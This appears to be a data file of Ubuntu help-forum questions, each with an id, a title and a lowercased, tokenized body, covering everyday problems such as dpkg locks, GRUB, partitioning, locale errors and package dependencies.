514994	i ca n't log-in to winscp using username `` root ''	i ca n't log-in to winscp using username `` root '' . i already change the password of `` root '' in ubuntu , and i successfully log-in there . but in winscp , it goes like this search for host ... connecting to host ... authenticating ... using username `` root '' authenticating with pre-entered password . access denied . and i am need to re-type the password again . by the way i 'm using vmware player for ubuntu . thanks !
514995	/var/lib/dpkg/lock ... ..help !	i had to reinstall the entire os a little while ago and i have been trying to reinstall all of the programs i had before but i got a bit a of a problem now . i was trying to download dropbox from synaptic but it can not finish the process and as a result i can not update anything anymore . the line that comes out is : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i have tried : sudo apt-get install -f sudo apt-get -f install sudo rm /var/lib/dpkg/lock sudo apt-get -f update sudo dpkg -- clear-selections sudo dpkg -- configure -a but nothing seems to work . so is there a way to solve this ? ? thanks
514996	how to use multiple hard drives in ubuntu linux ?	i have a desktop computer and in it there are two hard drives , one ssd and one hdd . i use the ssd for boot that works fine but i want to use the hdd for my files how can i do that . thanks
514997	bind eth0 to the tor network	i have a raspberry and would like to allow eth0 to only go out into the internet through the tor network . so that everything i watch , download etc . can not other but pass through the tor network . is that possible and if yes how do i archive that ?
514998	xubuntu 14.04 theme error	so i installed xubuntu 14.04 and i tried to change to the pre-installed theme numix but only the part under the title bar changed for file manager . that goes with every other theme . any solutions ?
515000	echo difference between ubuntu and red hat	i have mostly been experimenting with ubuntu but recently was using a red hat enterprise system and was surprised at a difference i found setting and displaying env variables . in ubuntu i might have an interaction like this : acomber @ mail : ~ $ export my_var=i686-linux acomber @ mail : ~ $ echo $ my_var i686-linux acomber @ mail : ~ $ echo `` $ my_var '' i686-linux but on rhel : acomber @ mail : ~ $ export my_var=i686-linux acomber @ mail : ~ $ echo $ my_var acomber @ mail : ~ $ echo `` $ my_var '' i686-linux i know this is a ubuntu forum but why the difference ? why do i need to enclose in quotes on rh ? there are no spaces in the variable name ? on ubuntu : acomber @ mail : ~ $ type echo echo is a shell builtin acomber @ mail : ~ $ ps aux | grep $ $ | head -n 1 acomber 2847 0.0 0.0 26876 3836 pts/7 ss 10:30 0:00 bash i will have to wait until i am back at work to try on rh machine .
515001	i 'm not getting grub menu	i installed ubuntu as second os ( i have windows 8 built-in ) on my sony vaio svf219 , but my pc directly boots into windows 8 without asking specific os to boot.please help me to solve this out . thanks in advance and sorry for my bad english .
515002	genymotion in ubuntu	is there anybody to help me ? i 've installed virtualbox and genymotion on ubuntu successfully . then i selected samsung galaxy s5 4.4.2 on genymotion , downloaded it succesfully either , but i 've got problems in installation of apk . so i did genymotion translation 1.1 and gapps-kk , but yet my apk did n't work . when i started genymotion appeared viber , tango , google service , etc , but unfortunately it has stopped .
515005	clone user profile with encrypted home folder	i 'd like to clone my user profile on my local machine . i 'd like to do so , just to keep all the preferences and not to have to redefine all of them manually . i 've tried this , but when i login , it will just return to kdm login screen . btw i 'm using kubuntu 14.04 . what might be interesting : i have encrypted my home folder . does this make any difference ? i 've also tried to copy the contents of .kde folder into /etc/skel , but this had no effect . thank you very much in advance , doublerainbow64
515007	java on easypeasy	i have successfully installed easypeasy in an asus eeepc . i want to use the authoring programm hot potatoes , which is/uses a java application ( sorry for my poor technical vocabulary ) . it is installed and extracted . i have found guidelines about how to use it here ( it is in german but the instructions for the terminal are clear ) . but it seems i can not install any java package . i have tried all the packages the terminal says are available and this is what terminal says : `` unable to find the package '' . in ubuntu i use hot potatoes with wine , but i can not install it in the asus , so i need to run it with java . thanks for your help .
515010	ubuntu 14.04 and dell e6440 - sound and mouse working after suspend/resume	i 've installed fresh ubuntu 14.04 on dell lattitude e6440 and i 've encountered two strange issues when doing full system start/restart : - mouse scroll when full restart is working very fast . one turn of the wheel cause very large change of value ( window scroll , sound change etc . ) but when i suspend and resume laptop it starts working correctly ( one turn of the wheel and small change of value - the same as in previous versions of ubuntu ) - sound from speakers - the same issue . when full restart the sound does not come from internal laptop speakers . it works though through headphones . after suspend/resume internal speakers starts to work . what can be a cause of these issues ?
515014	how do i create partition in ubuntu ?	i have a 2tb hard disk with ubuntu 14.04 . some 1.5 tb is used . i did not create any partitions during installation time of ubuntu 13.10 . i upgraded to 14.04 but after upgrading there are some hang/crash problems . how to i create seperate parition like c : drive in windows and other drive for just my data ( videos etc ) without losing data . after this i want to perform clean installation of 14.04.1 . here is output of sudo parted -l model : ata wdc wd20ezrx-00d ( scsi ) disk /dev/sda : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 2048mb 2047mb primary linux-swap ( v1 ) boot 2 2049mb 2000gb 1998gb extended 5 2049mb 32.4gb 30.3gb logical ext4 6 32.4gb 2000gb 1968gb logical ext4
515017	mysql workbench 6.17 error ubuntu 12.04 x64	im trying to run mysql workbench migration to transfer a table from ms sql to mysql . using the latest version of workbench ( or in fact any of the latest ones ) , the migration fails instantly and gives me this error : /usr/lib/x86_64-linux-gnu/libmysqlclient.so.18 : no version information available ( required by /usr/bin/wbcopytables ) relocation error : /usr/bin/wbcopytables : symbol mysql_options4 , version libmysqlclient_18 not defined in file libmysqlclient.so.18 with link time reference error : copy helper exited with an error : worker exited with status 127 if i try and use the shell script that workbench generates ( to carry out the transfer ) , i get this error instead : /usr/bin/wbcopytables : error while loading shared libraries : libwbbase.so : can not open shared object file : no such file or directory transfer works fine with an older version , but im having another issue with that now ( its not transferring all the rows of the table , it always stops at a certain point ) any help would be appreciated . thanks !
515020	ldap_bind : confidentiality required ( 13 )	i want to configure ldap with ssl so i used openssl for certificate and when i enable olcsecurity tls=1 in /etc/ldap/slapd.d/cn=config.ldif and now when i try to use ldapsearch or try to login it gives this message ldap_bind : confidentiality required ( 13 ) . help please
515023	how to keep my data during upgrading ?	i 'm currently still on ubuntu 8.10 and now wish to upgrade the latest version ( 14.04 at the time of writing ) . first of all is it safe to update from such an old version ? what problems should i expect to have to deal with ? what 's the best way to keep my user preferences and data intact ? i specifically want to keep : tomboy notes firefox scrapbook pages ( extension ) mozilla evolution email history/address book
515024	asus k56cb heats up very quickly with 14.04	i have 14.04 installed on my asus k56cb and it has n't been a real good experience so far : my laptop heats up very quickly when performing basic tasks like webbrowser with chrome and playing some flash-based games in it . my system has an nvidia gt740m using the latest nvidia drivers . ofcourse , i use the intel graphics all the time with prime profiles . also , when searching in the dash , the fan of my laptop is going a little bit louder and it heats up a bit . it 's very irritating mostly because i do n't have these problems with win7 or win8 ( .1 ) i really hope someone can help me because i want to continue to use ubuntu 14.04 on this machine .
515025	claws mail stuck in full-screen mode	i have ubuntu 12.04 and claws mail 3.8.0 . suddenly and i do n't know why , claws was in full-screen mode and i can not close it normally . the menu at the top does not show . now i have to go to `` compose '' so i can get my icons up , then left click and then quit . i ca n't find any menu item to get it out of full-screen mode . we have been using ubuntu since april so we have some experience with it , but we are far from experts .
515026	how to install new download of 14.04.1-desktop-amd 64.iso	i have no idea what i am doing here . i was given an ibm thinkpad with an outdated ubuntu os and could not figure out how to upgrade , so i simply downloaded the new 14.04.1-desktop-amd 64 iso . the download completed . there is an icon on the desktop . but being a pc user for all my computer life ... i can not for the life of me figure out how to install this os ! can anyone help me ?
515027	not able to install	i am not able to install any software ( from software center ) in ubuntu , after installing it gets failed and when i checked i detail , below error is coming .. please help me out for installing it , installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up install-info ( 5.2.0.dfsg.1-2 ) ... /etc/environment : line 2 : java_home : command not found dpkg : error processing package install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : install-info error in function : setting up install-info ( 5.2.0.dfsg.1-2 ) ... /etc/environment : line 2 : java_home : command not found dpkg : error processing package install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 i have following output for /etc/environment , java_home is already installed there . output of cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /uââsr/local/games '' java_home =/usr/lib/jvm/jdk1.7.0/bin i have updated the language support and getting the below error amulbhatia @ nadar : ~ $ sudo apt-get install language-pack-en [ sudo ] password for amulbhatia : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : kde-l10n-engb use 'apt-get autoremove ' to remove it . the following extra packages will be installed : language-pack-en-base the following packages will be upgraded : language-pack-en language-pack-en-base 2 upgraded , 0 newly installed , 0 to remove and 321 not upgraded . 1 not fully installed or removed . need to get 0 b/459 kb of archives . after this operation , 1,421 kb disk space will be freed . do you want to continue ? [ y/n ] y setting up install-info ( 5.2.0.dfsg.1-2 ) ... /etc/environment : line 2 : java_home : command not found dpkg : error processing package install-info ( -- configure ) : subprocess installed post-installation script returned error exit status 127 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) thanks in advance friends ,
515031	unmet dependencies when using apt-get , how can i solve it ?	when i try to install packages i get this error , what is wrong and how can i fix it ? dpkg : aviso : arquivos da lista de arquivos para o pacote `libisccc60 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libsepol1 ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxapian15 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ntfs-3g ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `whiptail ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libdrm2 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libmagic1 ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `netbase ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `bc ' faltando , assumind o que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libk5crypto3 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `mtr-tiny ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgc1c2 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `grub-common ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ubuntu-standard ' falta ndo , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libdbus-glib-1-2 ' falt ando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `pciutils ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `sgml-base ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libisc60 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `apt ' faltando , assumin do que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libtimedate-perl ' falt ando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `sysv-rc ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `perl-base ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ncurses-bin ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `byobu ' faltando , assum indo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `lvm2 ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-gnupginterface' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `openssl ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `vim-common ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `bzip2 ' faltando , assum indo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libssl0.9.8 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ssl-cert ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `update-inetd ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `lsb-release ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `apport-symptoms ' falta ndo , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `install-info ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . ( lendo banco de dados ... 30 % dpkg : aviso : arquivos da lista de arquivos para o pacote `sensible-utils ' faltan do , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `bsdutils ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `perl-modules ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ucf ' faltando , assumin do que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `psmisc ' faltando , assu mindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgpg-error0 ' faltand o , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libpython2.6 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libusb-0.1-4 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libpci3 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxml-sax-perl ' falta ndo , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libpam0g ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libpopt0 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ncurses-base ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-zope.interface' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `linux-image-generic-pa e ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libfuse2 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-minimal ' faltan do , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgssapi-krb5-2 ' falt ando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `dnsutils ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgeoip1 ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `wpasupplicant ' faltand o , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `procps ' faltando , assu mindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `cpp-4.4 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libparted0debian1 ' fal tando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libcurl3-gnutls ' falta ndo , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `lsb-base ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libtasn1-3 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libuuid1 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `lzma ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-dbus ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libjs-jquery ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libbind9-60 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgcrypt11 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgdbm3 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libhtml-format-perl ' f altando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `man-db ' faltando , assu mindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libffi5 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `module-init-tools ' fal tando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `gettext-base ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libdbus-1-3 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libgmp3c2 ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `ubuntu-serverguide ' fa ltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `gpgv ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `login ' faltando , assum indo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `telnet ' faltando , assu mindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxml2 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `wireless-crda ' faltand o , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `laptop-detect ' faltand o , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `makedev ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `initramfs-tools ' falta ndo , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-twisted-bin ' fa ltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxmuu1 ' faltando , as sumindo que o pacote não possui arquivos atualmente instalados . ( lendo banco de dados ... 35 % dpkg : aviso : arquivos da lista de arquivos para o pacote `libisccfg60 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libclass-accessor-perl ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxml-parser-perl ' fa ltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `debianutils ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libfreetype6 ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `sudo ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `coreutils ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxdmcp6 ' faltando , a ssumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libmpfr1ldbl ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `dash ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `memtest86+ ' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libelf1 ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `debconf ' faltando , ass umindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libtext-wrapi18n-perl' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `tcpd ' faltando , assumi ndo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `python-pkg-resources' faltando , assumindo que o pacote não possui arquivos atualmente instalados . dpkg : aviso : arquivos da lista de arquivos para o pacote `libxml-libxml-perl ' fa ltando , assumindo que o pacote não possui arquivos atualmente instalados . ( lendo banco de dados ... 57 arquivos e diretórios atualmente instalados ) . preparando para substituir php5-common 5.3.2-1ubuntu4.24 ( usando ... /php5-common _5.3.2-1ubuntu4.26_i386.deb ) ... desempacotando substituto php5-common ... dpkg : erro processando /var/cache/apt/archives/php5-common_5.3.2-1ubuntu4.26_i38 6.deb ( -- unpack ) : impossível criar '/usr/lib/php5/maxlifetime.dpkg-new ' ( enquanto processava './u sr/lib/php5/maxlifetime ' ) : permissão negada dpkg-deb : sub-processo colar foi morto por sinal ( pipe quebrado ) erros foram encontrados durante o processamento de : /var/cache/apt/archives/php5-common_5.3.2-1ubuntu4.26_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ samp : ~ # root @ samp : /var/www/map # sudo apt-get autoremove lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto você pode querer executar 'apt-get -f install ' para corrigí-los . os pacotes a seguir têm dependências desencontradas : libapache2-mod-php5 : depende : php5-common ( = 5.3.2-1ubuntu4.26 ) mas 5.3.2-1ubu ntu4.24 está instalado e : dependências desencontradas . tente usar -f. root @ samp : /var/www/map # sudo apt-get purge lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto você pode querer executar 'apt-get -f install ' para corrigí-los . os pacotes a seguir têm dependências desencontradas : libapache2-mod-php5 : depende : php5-common ( = 5.3.2-1ubuntu4.26 ) mas 5.3.2-1ubu ntu4.24 está instalado e : dependências desencontradas . tente usar -f. root @ samp : /var/www/map # sudo apt-get clean root @ samp : /var/www/map # apt-get install -f ... do n't fix ... : /
515035	no package 'ncurses ' found	i 'm trying to install xwiimote and they tell me to run ./autogen.sh in the installation notes . this is the output : zorin @ samsung-np300e4z-s03th : ~/downloads/xwiimote-master $ ./autogen.shlibtoolize : putting auxiliary files in ac_config_aux_dir , `build-aux ' . libtoolize : linking file `build-aux/ltmain.sh' libtoolize : putting macros in ac_config_macro_dir , `m4 ' . libtoolize : linking file `m4/libtool.m4' libtoolize : linking file `m4/ltoptions.m4' libtoolize : linking file `m4/ltsugar.m4' libtoolize : linking file `m4/ltversion.m4' libtoolize : linking file `m4/lt~obsolete.m4' checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking whether gcc understands -c and -o together ... yes checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... no checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for style of include used by make ... gnu checking whether make supports nested variables ... yes checking how to create a pax tar archive ... gnutar checking dependency style of gcc ... gcc3 checking whether make supports nested variables ... ( cached ) yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking whether gcc understands -c and -o together ... ( cached ) yes checking for gcc option to accept iso c99 ... -std=gnu99 checking whether ln -s works ... yes checking for ar ... ar checking the archiver ( ar ) interface ... ar checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc -std=gnu99 ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc -std=gnu99 object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc -std=gnu99 supports -fno-rtti -fno-exceptions ... no checking for gcc -std=gnu99 option to produce pic ... -fpic -dpic checking if gcc -std=gnu99 pic flag -fpic -dpic works ... yes checking if gcc -std=gnu99 static flag -static works ... yes checking if gcc -std=gnu99 supports -c -o file.o ... yes checking if gcc -std=gnu99 supports -c -o file.o ... ( cached ) yes checking whether the gcc -std=gnu99 linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for udev ... yes checking for ncurses ... no configure : error : package requirements ( ncurses ) were not met : ` no package 'ncurses ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables ncurses_cflags and ncurses_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . zorin @ samsung-np300e4z-s03th : ~/downloads/xwiimote-master $ sudo apt-get install ncurses reading package lists ... done building dependency tree reading state information ... done package ncurses is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ncurses ' has no installation candidate zorin @ samsung-np300e4z-s03th : ~/downloads/xwiimote-master $ i see that it says no package 'ncurses ' found . have any ideas which package i have to install ? please help ! i will appreciate that very much . : )
